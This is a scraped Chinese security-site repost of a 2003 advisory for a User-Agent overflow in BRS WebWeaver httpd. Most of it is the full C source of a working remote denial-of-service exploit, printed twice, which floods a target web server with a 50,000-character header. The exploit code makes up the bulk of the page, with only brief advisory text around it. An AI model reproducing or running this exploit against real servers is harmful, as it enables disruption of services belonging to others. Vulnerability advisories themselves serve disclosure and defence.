- Rongsen.Com.Cn 版权所有 2008-2010 京ICP备08007000号 京公海网安备11010802026356号 朝阳网安编号:110105199号
- 北京黑客防线网安工作室-黑客防线网安服务器维护基地为您提供专业的
服务器维护
,企业网站维护
,网站维护
服务 - (建议采用1024×768分辨率,以达到最佳视觉效果) Powered by 黑客防线网安 ©2009-2010 www.rongsen.com.cn
BRS WebWeaver httpd `User-Agent`远程拒绝服务漏洞
作者:黑客防线网安网站维护基地 来源:黑客防线网安网站维护基地 浏览次数:0本篇关键词:漏洞
|
黑客防线网安网讯:发布时间:2003-11-04更新时间:2003-11-04严重程度:中威胁程度:远程拒绝服务错误类型:边界检查错误利用方式:服务器模式BUGTRAQ ID:8947受影响系统
BRS WebWeaver 62 betaBRS WebWeaver 0.49 betaBRS We ...
BRS WebWeaver 62 betaBRS WebWeaver 0.49 betaBRS We ...
发布时间:2003-11-04
更新时间:2003-11-04
严重程度:中
威胁程度:远程拒绝服务
错误类型:边界检查错误
利用方式:服务器模式
BUGTRAQ ID:8947
受影响系统
BRS WebWeaver是支持CGI,ISAPI,SSI和基于IP地址安全的WEB服务程序。
当BRS WebWeaver接收到包含超长字符串的`User-Agent`字段时,可导致服务程序停止响应。
测试代码
/*
* BRS WebWeaver v.1.06 remote DoS exploit
*
* -d4rkgr3y [d4rk securitylab ru]
*
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>
#define port 80
main(int argc, char **argv) {
struct hostent *hs;
struct sockaddr_in sock;
int sockfd, i;
const c = 50000;
char request[50150] =
"GET /m00-r0cz HTTP/1.0\n"
"Accept: */*\n"
"Accept-Language: jp\n"
"Accept-Encoding: gzip, deflate\n"
"Host: m00security.org\n"
"User-Agent: ";
printf("BRS WebWeaver v.1.06 remote DoS exploit\n\n");
if (argc!=2){
printf("usage\n %s hostname\n\n",argv[0]);
exit(1);
}
//memset((request+98),0x41,c);
memset((request+strlen(request)),0x41,c);
/* l33t ;] */
request[strlen(request)] = 0x0a;
request[strlen(request)] = 0x43;
request[strlen(request)] = 0x6f;
request[strlen(request)] = 0x6e;
request[strlen(request)] = 0x6e;
request[strlen(request)] = 0x65;
request[strlen(request)] = 0x63;
request[strlen(request)] = 0x74;
request[strlen(request)] = 0x69;
request[strlen(request)] = 0x6f;
request[strlen(request)] = 0x6e;
request[strlen(request)] = 0x3a;
request[strlen(request)] = 0x20;
request[strlen(request)] = 0x4b;
request[strlen(request)] = 0x65;
request[strlen(request)] = 0x65;
request[strlen(request)] = 0x70;
request[strlen(request)] = 0x2d;
request[strlen(request)] = 0x41;
request[strlen(request)] = 0x6c;
request[strlen(request)] = 0x69;
request[strlen(request)] = 0x76;
request[strlen(request)] = 0x65;
request[strlen(request)] = 0x0a;
request[strlen(request)] = 0x0a;
bzero(&sock, sizeof(sock));
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
if ((sock.sin_addr.s_addr=inet_addr(argv[1]))==-1) {
if ((hs=gethostbyname(argv[1]))==NULL) {
printf("damn");
exit(1);
}
printf("~ Host resolved.\n");
sock.sin_family = hs->h_addrtype;
memcpy((caddr_t)&sock.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("damn"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&sock, sizeof(sock)) < 0){
perror("damn"); exit(0);
}
printf("~ Socket connected\n");
printf("~ Sending evil code... ");
write(sockfd,request,strlen(request));
printf("done\n\n");
close(sockfd);
}
/* m00 */
相关信息
d4rkgr3y <d4rk@securitylab.ru>.
参考:http://www.securityfocus.com/archive/1/343111
更新时间:2003-11-04
严重程度:中
威胁程度:远程拒绝服务
错误类型:边界检查错误
利用方式:服务器模式
BUGTRAQ ID:8947
受影响系统
BRS WebWeaver 62 beta详细描述
BRS WebWeaver 0.49 beta
BRS WebWeaver 0.50 beta
BRS WebWeaver 0.51 beta
BRS WebWeaver 0.52 beta
BRS WebWeaver 0.60 beta
BRS WebWeaver 0.61 beta
BRS WebWeaver 0.62 beta
BRS WebWeaver 0.63 beta
BRS WebWeaver 1.0 6
BRS WebWeaver 1.0 5
BRS WebWeaver 1.0 4
BRS WebWeaver 1.0 3
BRS WebWeaver 1.0 2
BRS WebWeaver 1.0 1
BRS WebWeaver是支持CGI,ISAPI,SSI和基于IP地址安全的WEB服务程序。
当BRS WebWeaver接收到包含超长字符串的`User-Agent`字段时,可导致服务程序停止响应。
测试代码
/*
* BRS WebWeaver v.1.06 remote DoS exploit
*
* -d4rkgr3y [d4rk securitylab ru]
*
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>
#define port 80
main(int argc, char **argv) {
struct hostent *hs;
struct sockaddr_in sock;
int sockfd, i;
const c = 50000;
char request[50150] =
"GET /m00-r0cz HTTP/1.0\n"
"Accept: */*\n"
"Accept-Language: jp\n"
"Accept-Encoding: gzip, deflate\n"
"Host: m00security.org\n"
"User-Agent: ";
printf("BRS WebWeaver v.1.06 remote DoS exploit\n\n");
if (argc!=2){
printf("usage\n %s hostname\n\n",argv[0]);
exit(1);
}
//memset((request+98),0x41,c);
memset((request+strlen(request)),0x41,c);
/* l33t ;] */
request[strlen(request)] = 0x0a;
request[strlen(request)] = 0x43;
request[strlen(request)] = 0x6f;
request[strlen(request)] = 0x6e;
request[strlen(request)] = 0x6e;
request[strlen(request)] = 0x65;
request[strlen(request)] = 0x63;
request[strlen(request)] = 0x74;
request[strlen(request)] = 0x69;
request[strlen(request)] = 0x6f;
request[strlen(request)] = 0x6e;
request[strlen(request)] = 0x3a;
request[strlen(request)] = 0x20;
request[strlen(request)] = 0x4b;
request[strlen(request)] = 0x65;
request[strlen(request)] = 0x65;
request[strlen(request)] = 0x70;
request[strlen(request)] = 0x2d;
request[strlen(request)] = 0x41;
request[strlen(request)] = 0x6c;
request[strlen(request)] = 0x69;
request[strlen(request)] = 0x76;
request[strlen(request)] = 0x65;
request[strlen(request)] = 0x0a;
request[strlen(request)] = 0x0a;
bzero(&sock, sizeof(sock));
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
if ((sock.sin_addr.s_addr=inet_addr(argv[1]))==-1) {
if ((hs=gethostbyname(argv[1]))==NULL) {
printf("damn");
exit(1);
}
printf("~ Host resolved.\n");
sock.sin_family = hs->h_addrtype;
memcpy((caddr_t)&sock.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("damn"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&sock, sizeof(sock)) < 0){
perror("damn"); exit(0);
}
printf("~ Socket connected\n");
printf("~ Sending evil code... ");
write(sockfd,request,strlen(request));
printf("done\n\n");
close(sockfd);
}
/* m00 */
相关信息
d4rkgr3y <d4rk@securitylab.ru>.
参考:http://www.securityfocus.com/archive/1/343111
黑客防线网安服务器维护方案本篇连接:http://www.rongsen.com.cn/show.php?contentid-3054.html
新闻栏目
| 我要申请本站:N点 | 黑客防线官网 | |
| 专业服务器维护及网站维护手工安全搭建环境,网站安全加固服务。黑客防线网安服务器维护基地招商进行中!QQ:29769479 |